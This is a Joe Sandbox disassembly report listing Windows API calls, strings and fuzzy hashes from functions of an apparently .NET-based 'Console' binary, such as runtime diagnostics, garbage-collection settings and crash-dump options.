                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 010A03D5
                                                                                                                                                                                                                            • Part of subcall function 010A3070: HeapFree.KERNEL32(00000000,?,7CAB6A82,?,?,?,00000000,014CADA6,000000FF), ref: 010A30B8
                                                                                                                                                                                                                            • Part of subcall function 0121AF80: HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,0151591C,?,01136CBA), ref: 0121AFD0
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap$fclose$CurrentProcess_wfopenfflushfputs
                                                                                                                                                                                                                          • String ID: %s: "%s".$Ready to Run not enabled.
                                                                                                                                                                                                                          • API String ID: 2498482485-2996686961
                                                                                                                                                                                                                          • Opcode ID: aee81102a4cd8e156819d4ca43a40bd04c98326582385fd474f5a979fa7a110d
                                                                                                                                                                                                                          • Instruction ID: 76aded454093344ee5c6e7bcedff8e3d18bc05b5f1be02a582915c8fda216f45
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aee81102a4cd8e156819d4ca43a40bd04c98326582385fd474f5a979fa7a110d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0381AA719012689FEB21CF98CD88BDEBBB8FF04314F5042D8E959A72A4DB745A84CF51
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 01215D50: GetProcessHeap.KERNEL32(7CAB6A82,00000000,00000000,014B5000,000000FF,?,0122A0F5), ref: 01215D7E
                                                                                                                                                                                                                            • Part of subcall function 01215D50: RtlAllocateHeap.NTDLL(03BF0000,00000000,00000030,7CAB6A82,00000000,00000000,014B5000,000000FF,?,0122A0F5), ref: 01215D9A
                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 010D854F
                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 010D85C2
                                                                                                                                                                                                                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 010D85D5
                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 010D85FA
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 010D8605
                                                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(Microsoft-Windows-DotNETRuntimeRundown,00000000), ref: 010D8655
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • Microsoft-Windows-DotNETRuntimeRundown, xrefs: 010D8650
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ByteCharMultiWide$Heap$AllocateProcessfreemallocstrcmp
                                                                                                                                                                                                                          • String ID: Microsoft-Windows-DotNETRuntimeRundown
                                                                                                                                                                                                                          • API String ID: 753784251-930870680
                                                                                                                                                                                                                          • Opcode ID: c780a731e7555412a8264588536325889a65994202c29672186ceac479feb5a7
                                                                                                                                                                                                                          • Instruction ID: 02126896b65a046605233712a1384b5336b8f9621411b1f674c7270e73c44827
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c780a731e7555412a8264588536325889a65994202c29672186ceac479feb5a7
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4151E6716443019FD721CF29DC49B16BBE4AF88720F14866EF959AB3D9E771E400CBA2
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0122C950: GetModuleFileNameW.KERNEL32(00FC0000,00000000), ref: 0122C9D6
                                                                                                                                                                                                                            • Part of subcall function 0122C950: GetLastError.KERNEL32 ref: 0122CA07
                                                                                                                                                                                                                            • Part of subcall function 0122C950: SetLastError.KERNEL32(00000000,00000000), ref: 0122CB11
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,7CAB6A82,?,?), ref: 01010E9D
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,?,0000005C,7CAB6A82,?,?), ref: 01011072
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,createdump.exe,7CAB6A82,?,?), ref: 01011178
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap$ErrorLast$FileModuleName
                                                                                                                                                                                                                          • String ID: %s$ --diag$ --name $--full$--normal$--triage$--withheap$createdump.exe
                                                                                                                                                                                                                          • API String ID: 3203759797-1772839692
                                                                                                                                                                                                                          • Opcode ID: b515cf1c75c11445419d29647b08d74e23327719fda92279a5a8e1d1b39be01f
                                                                                                                                                                                                                          • Instruction ID: e2a951af74245e1306b82fe1f87586f0e9f5a37315d5a33527b965a070b4a61e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b515cf1c75c11445419d29647b08d74e23327719fda92279a5a8e1d1b39be01f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C1C18371E006298BDB65CB29CC417EDB7F1BB49310F0482D9E9C9A7289D7789E91CF84
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?), ref: 01227A41
                                                                                                                                                                                                                          • GetLastError.KERNEL32(00000008,?), ref: 01227C39
                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 01227C74
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 01227D4B
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Free$Heap$ErrorLastLibrary
                                                                                                                                                                                                                          • String ID: DllGetClassObject
                                                                                                                                                                                                                          • API String ID: 4070658762-1075368562
                                                                                                                                                                                                                          • Opcode ID: 8de49accee4c861d38bf3128311a1e405f42bc746c6e3cfa125712f8f7e977e5
                                                                                                                                                                                                                          • Instruction ID: d35259a89c75aa844c08b3f4e30e63345cc791e60ac206ede0fee43d976836a9
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8de49accee4c861d38bf3128311a1e405f42bc746c6e3cfa125712f8f7e977e5
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AED18C75D2523AABDB21DF68DC887ADBBB1AF68310F1441D9D909A7390D7749E80CF80
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000001,00000000,?,00000000,00000000,00000000,00000001), ref: 010E03DF
                                                                                                                                                                                                                            • Part of subcall function 0121AF80: HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,0151591C,?,01136CBA), ref: 0121AFD0
                                                                                                                                                                                                                          • GetCommandLineW.KERNEL32 ref: 010E00F8
                                                                                                                                                                                                                          • wcsncmp.API-MS-WIN-CRT-STRING-L1-1-0(03BF100E,?,?), ref: 010E0117
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 010E0283
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap$CommandLinewcsncmp
                                                                                                                                                                                                                          • String ID: GCGenAnalysisBytes$GCGenAnalysisGen$GCGenAnalysisTimeMSec$GCGenAnalysisTimeUSec$gcgenaware.{pid}.nettrace
                                                                                                                                                                                                                          • API String ID: 894456492-1061429456
                                                                                                                                                                                                                          • Opcode ID: 19594d42bf69a7a3aae8ea5a258fa6dfcb8bfa8e67825b4b7d019732d1348368
                                                                                                                                                                                                                          • Instruction ID: 2bfe12be0b4814271392b9f9645118023dc10a678abb62eef065a7dde19ec270
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 19594d42bf69a7a3aae8ea5a258fa6dfcb8bfa8e67825b4b7d019732d1348368
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 029103B4A10206EFD720DF69DD48B9A7BF5FFA4300F1086D9E9049B298EBB09954CB51
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SetEvent.KERNEL32(?,?,01242A01,?,?,?,03C176F0), ref: 0123C620
                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,00000000,?,01242A01,?,?,?,03C176F0), ref: 0123C65F
                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0123C688
                                                                                                                                                                                                                          • ResetEvent.KERNEL32(?,?,01242A01,?,?,?,03C176F0), ref: 0123C69D
                                                                                                                                                                                                                          • SetEvent.KERNEL32(?,?,01242A01,?,?,?,03C176F0), ref: 0123C71B
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • D::TART: Skipping for shutdown., xrefs: 0123C5AE
                                                                                                                                                                                                                          • D::SSCIPCE: Calling IsRCThreadReady(), xrefs: 0123C639
                                                                                                                                                                                                                          • D::TART: Trapping all Runtime threads., xrefs: 0123C5E3
                                                                                                                                                                                                                          • D::SSCIPCE: done doing helper thread duty. Current helper thread id=0x%x, xrefs: 0123C6F7
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Event$CurrentObjectResetSingleThreadWait
                                                                                                                                                                                                                          • String ID: D::SSCIPCE: Calling IsRCThreadReady()$D::SSCIPCE: done doing helper thread duty. Current helper thread id=0x%x$D::TART: Skipping for shutdown.$D::TART: Trapping all Runtime threads.
                                                                                                                                                                                                                          • API String ID: 976909831-2666063001
                                                                                                                                                                                                                          • Opcode ID: 5fce700bd5dfc20176c4f9d518882c4e9dc32b11cbc557f8b182a2cdad17ba40
                                                                                                                                                                                                                          • Instruction ID: a6b5973d37c302b98725c3d7085d51be69bdaee7cad745e0ab192512c60e8b3e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5fce700bd5dfc20176c4f9d518882c4e9dc32b11cbc557f8b182a2cdad17ba40
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 55410674720301AFEB249F68D885B667BA5FF84300F14409DEE055B3A6EB76EC60CB61
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,7CAB6A82,?,00000001,00000000), ref: 0105E837
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 0105E8C3
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 0105E901
                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000000,00000000,00000000), ref: 0105E93D
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?), ref: 0105E99F
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,7CAB6A82,00000000,?,00000000), ref: 0105EAC8
                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,?,7CAB6A82,00000000,?,00000000), ref: 0105EB42
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,00000000,?,7CAB6A82,00000000,?,00000000), ref: 0105EB71
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap$ByteCharMultiWide$strlen
                                                                                                                                                                                                                          • String ID: Arg_InvalidUTF8String
                                                                                                                                                                                                                          • API String ID: 1299763742-2433089184
                                                                                                                                                                                                                          • Opcode ID: 7bd1fbd742accf591b809c3aa0b75f991208294a6af5d433df53f254d5867f09
                                                                                                                                                                                                                          • Instruction ID: 35dd4719866b9fcaeb1be24443771d0abffc8ff54ddf3a14795f644c577a15fb
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7bd1fbd742accf591b809c3aa0b75f991208294a6af5d433df53f254d5867f09
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0CA19374A40219AFEBA09F59DC88BABF7F9FB44710F1001E9E989A7291D7745E408F90
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetLastError.KERNEL32(00000000,00650072,03C176F0,?,7CAB6A82), ref: 0115DBCE
                                                                                                                                                                                                                          • SetEvent.KERNEL32(03C16350,03C16300,00000001,0115DCA4), ref: 0115E020
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • Waiting for GC completion failed, xrefs: 0115DE16
                                                                                                                                                                                                                          • RareEnablePreemptiveGC: entering. Thread state = %x, xrefs: 0115DFD6
                                                                                                                                                                                                                          • RareDisablePreemptiveGC: entering. Thread state = %x, xrefs: 0115DC68
                                                                                                                                                                                                                          • RareEnablePreemptiveGC: leaving., xrefs: 0115E05A
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ErrorEventLast
                                                                                                                                                                                                                          • String ID: RareDisablePreemptiveGC: entering. Thread state = %x$RareEnablePreemptiveGC: entering. Thread state = %x$RareEnablePreemptiveGC: leaving.$Waiting for GC completion failed
                                                                                                                                                                                                                          • API String ID: 3848097054-492000563
                                                                                                                                                                                                                          • Opcode ID: afb417fbe325976edc528aa1327c188be87fa6f62b6062b1a6882b801e246326
                                                                                                                                                                                                                          • Instruction ID: 9c4b7f8591e636ea4285e9f57fdddba9c1f74c3c6fea5018d2d835a302d7bd20
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: afb417fbe325976edc528aa1327c188be87fa6f62b6062b1a6882b801e246326
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E991E430700301DBEF6D9B5CEC84B6A7BA5AF40704F09805CED695B2DADBB1A851CBA1
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 012D6020: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000018,?,00000000,?,012DA7F8,?,00000000,?,?,?,?,?,012DACC7), ref: 012D6025
                                                                                                                                                                                                                            • Part of subcall function 012D6020: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,012DACC7,?,?,?,012D74ED), ref: 012D6073
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000006,012D9CE0,?,?,?,?,?,012DACC7,?,?,?,012D74ED), ref: 012DA84E
                                                                                                                                                                                                                            • Part of subcall function 012DB590: WriteFile.KERNEL32(?,?,?,00000000,00000004,00000000,00000000,00000001,?), ref: 012DB5B5
                                                                                                                                                                                                                            • Part of subcall function 012DB590: GetLastError.KERNEL32 ref: 012DB5C4
                                                                                                                                                                                                                            • Part of subcall function 012DB590: GetOverlappedResult.KERNEL32(?,00000004,00000000,00000001), ref: 012DB5DE
                                                                                                                                                                                                                          • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,?,012DACC7,?,?,?,012D74ED), ref: 012DA88B
                                                                                                                                                                                                                          • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,012DACC7,?,?,?,012D74ED), ref: 012DA8CA
                                                                                                                                                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,012DACC7,?,?,?,012D74ED), ref: 012DA942
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000006,012D9CE0,?,?,?,?,?,012DACC7,?,?,?,012D74ED), ref: 012DA9DD
                                                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000006,012D9CE0,?,?,?,?,?,012DACC7,?,?,?,012D74ED), ref: 012DAA00
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • DOTNET_IPC_V1, xrefs: 012DA996
                                                                                                                                                                                                                          • Failed to send DiagnosticsIPC response, xrefs: 012DA829
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: free$EnvironmentStringsmalloc$ErrorFileFreeLastOverlappedResultWrite
                                                                                                                                                                                                                          • String ID: DOTNET_IPC_V1$Failed to send DiagnosticsIPC response
                                                                                                                                                                                                                          • API String ID: 3916477055-2167823670
                                                                                                                                                                                                                          • Opcode ID: c904babaa6ead7e411d248bf9c42c9969a5e09ab871a9778739655831339e963
                                                                                                                                                                                                                          • Instruction ID: 1c706e76e299e1d809f0ab50cf824bc608612e0e90da17f88eb313d116ccccd3
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c904babaa6ead7e411d248bf9c42c9969a5e09ab871a9778739655831339e963
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CE612775A102029BDF109F68C841BAEBBB1FF88300F1A816CDE46AB355D771E912CBD1
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0121AF80: HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,0151591C,?,01136CBA), ref: 0121AFD0
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,7CAB6A82,00000001,01638748), ref: 01136A62
                                                                                                                                                                                                                          • wcstok_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,0159BB90,00000001,7CAB6A82), ref: 01136AE5
                                                                                                                                                                                                                          • wcstok_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,015A6828,?), ref: 01136B00
                                                                                                                                                                                                                          • wcstok_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,015A6828,?), ref: 01136B16
                                                                                                                                                                                                                          • _swprintf.LIBCMT ref: 01136B71
                                                                                                                                                                                                                          • wcstok_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,0159BB90,?,?,00000000,00000000,00000000,000000FF), ref: 01136B9E
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 01136BCC
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • {%08x-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x}, xrefs: 01136B69
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: wcstok_s$FreeHeap$_swprintf
                                                                                                                                                                                                                          • String ID: {%08x-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x}
                                                                                                                                                                                                                          • API String ID: 4021065324-128308884
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • wcsncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,00000104,gcgenaware.{pid}.nettrace,00000000,00000000,00000001), ref: 01229B27
                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 01229B30
                                                                                                                                                                                                                          • _itow_s.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000,?,00000014,0000000A), ref: 01229B3F
                                                                                                                                                                                                                          • wcscat_s.API-MS-WIN-CRT-STRING-L1-1-0(?,00000104,?), ref: 01229B4F
                                                                                                                                                                                                                          • wcscat_s.API-MS-WIN-CRT-STRING-L1-1-0(?,00000104,?), ref: 01229B62
                                                                                                                                                                                                                          • wcsncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,00000104,gcgenaware.{pid}.nettrace,gcgenaware.{pid}.nettrace,00000000,00000001), ref: 01229B9A
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
• Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: wcscat_swcsncpy_s$CurrentProcess_itow_s
                                                                                                                                                                                                                          • String ID: gcgenaware.{pid}.nettrace${pid}
                                                                                                                                                                                                                          • API String ID: 1046258036-1878681484
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,00000407,00000000,?), ref: 01096C7D
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                                          • String ID: (dynamicClass)$(null)$...$VALUETYPE
                                                                                                                                                                                                                          • API String ID: 3298025750-1208169921
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(0164759C,7CAB6A82,03C16310,00000000,01647570,00000000,014B3694,000000FF,?,00FC3141,01647570,01647CF0,00000000), ref: 00FC21F2
                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(016475B8,?,00FC3141,01647570,01647CF0,00000000), ref: 00FC2215
                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(016475D4,?,00FC3141,01647570,01647CF0,00000000), ref: 00FC2236
                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(01647574,?,00FC3141,01647570,01647CF0,00000000), ref: 00FC2266
                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(0164766C,?,00FC3141,01647570,01647CF0,00000000), ref: 00FC22A7
                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(01647644,?,00FC3141,01647570,01647CF0,00000000), ref: 00FC22E8
                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(01647694,?,00FC3141,01647570,01647CF0,00000000), ref: 00FC2329
                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(016476BC,?,00FC3141,01647570,01647CF0,00000000), ref: 00FC236A
                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(016475F0,?,00FC3141,01647570,01647CF0,00000000), ref: 00FC239C
                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(0164760C,?,00FC3141,01647570,01647CF0,00000000), ref: 00FC23C0
                                                                                                                                                                                                                          • InitializeCriticalSection.KERNEL32(01647628,?,00FC3141,01647570,01647CF0,00000000), ref: 00FC23E4
                                                                                                                                                                                                                            • Part of subcall function 01215CA0: GetProcessHeap.KERNEL32(?,012192BA,0000000C,7CAB6A82,?,00000002,?,?,014B3694,000000FF,?,0122426E,00000002,00000002), ref: 01215CAC
                                                                                                                                                                                                                            • Part of subcall function 01215CA0: RtlAllocateHeap.NTDLL(03BF0000,00000000,00000002,?,012192BA,0000000C,7CAB6A82,?,00000002,?,?,014B3694,000000FF,?,0122426E,00000002), ref: 01215CCA
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalInitializeSection$Heap$AllocateProcess
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4157389036-0
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,00000000,?,7CAB6A82,-00000001), ref: 012165AE
                                                                                                                                                                                                                          • wcsncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,00000055,00000000,00000055,00000000,7CAB6A82,-00000001,7CAB6A82,?), ref: 0121666B
                                                                                                                                                                                                                          • wcsncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,00000055,00000000,00000055,00000000,7CAB6A82,-00000001,7CAB6A82,?), ref: 012166A8
                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,00000000,7CAB6A82,-00000001,7CAB6A82,?), ref: 01216736
                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,00000000,7CAB6A82,-00000001,7CAB6A82,?), ref: 01216783
                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,00000000,7CAB6A82,-00000001,7CAB6A82,?), ref: 0121679E
                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,00000000,?,7CAB6A82,-00000001,7CAB6A82,?), ref: 01216801
                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,00000000,00000001,00000000,00000000,?,7CAB6A82,-00000001), ref: 01216901
                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,00000000,00000001,00000000,00000000,?,7CAB6A82,-00000001), ref: 0121694F
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.1626563974.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true
• Associated: 00000000.00000002.1626532949.0000000000FC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1626929815.00000000014FE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1627029683.0000000001637000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1627089409.000000000163A000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1627110535.000000000163C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1627110535.0000000001641000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1627110535.0000000001647000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1627110535.0000000001649000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1627181176.0000000001651000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fc0000_Console.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalLeaveSection$FreeLibrarywcsncpy_s
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 728819610-0
                                                                                                                                                                                                                          • Opcode ID: d4bdece7f8cb406bc41e94c1412d3a89a448c733e03bf5f9edb610f950daf07b
                                                                                                                                                                                                                          • Instruction ID: 2a6753625e8c2b579fe8ded523bf84ad222234ac465fee8188bd8f11a6a4bc36
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d4bdece7f8cb406bc41e94c1412d3a89a448c733e03bf5f9edb610f950daf07b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4AE1AAB0A20247DFEB25CF68C8487AEBBF5FF24314F054119DE14A7299E7B59941CB90
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(gcServer,gcServer,00000000,00000000,00FC0000), ref: 010DC5C3
                                                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(gcServer,gcConcurrent), ref: 010DC5F7
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: strcmp
                                                                                                                                                                                                                          • String ID: GCRetainVM$System.GC.Server$gcConcurrent$gcServer
                                                                                                                                                                                                                          • API String ID: 1004003707-3257568746
